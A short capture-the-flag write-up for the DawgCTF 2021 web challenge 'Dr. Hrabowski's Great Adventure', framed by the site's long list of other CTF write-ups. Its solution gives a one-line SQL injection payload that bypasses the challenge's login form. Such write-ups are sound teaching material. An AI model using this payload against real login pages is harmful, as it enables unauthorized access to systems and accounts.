👨💻
👨💻
👨💻
👨💻
CTFs
Home
Pentesting
Learn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
Cyber League Major 1
STANDCON CTF 2021
2022
Securinets CTF Finals 2022
NahamCon CTF 2022
Securinets CTF Quals 2022
CTF.SG CTF
YaCTF 2022
DiceCTF 2022
TetCTF 2022
2021
hxp CTF 2021
HTX Investigator's Challenge 2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
Bofit
Jellyspotters
No Step On Snek
Back to the Lab 2
MDL Considered Harmful
Really Secure Algorithm
The Obligatory RSA Challenge
Trash Chain
What the Flip?!
Back to the Lab 1
Back to the Lab 3
Dr. Hrabowski's Great Adventure
Just a Comment
Baby's First Modulation
Two Truths and a Fib
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By
GitBook
Dr. Hrabowski's Great Adventure
SQL Injection
Problem
President Freeman Hrabowski is having a relaxing evening in Downtown Baltimore. But he forgot his password to give all UMBC students an A in all their classes this semester! Find a way to log in and help him out.
http://umbccd.io:6100
(If you get an SSL error, try a different browser)
Author: Clearedge
Solution
To bypass authentication, the basic payload
username=admin&password=' or 1=1;#
works.
The flag is in the image's name attribute.
Previous
Back to the Lab 3
Next
Just a Comment
Last modified
13d ago
Copy link
Contents
Problem
Solution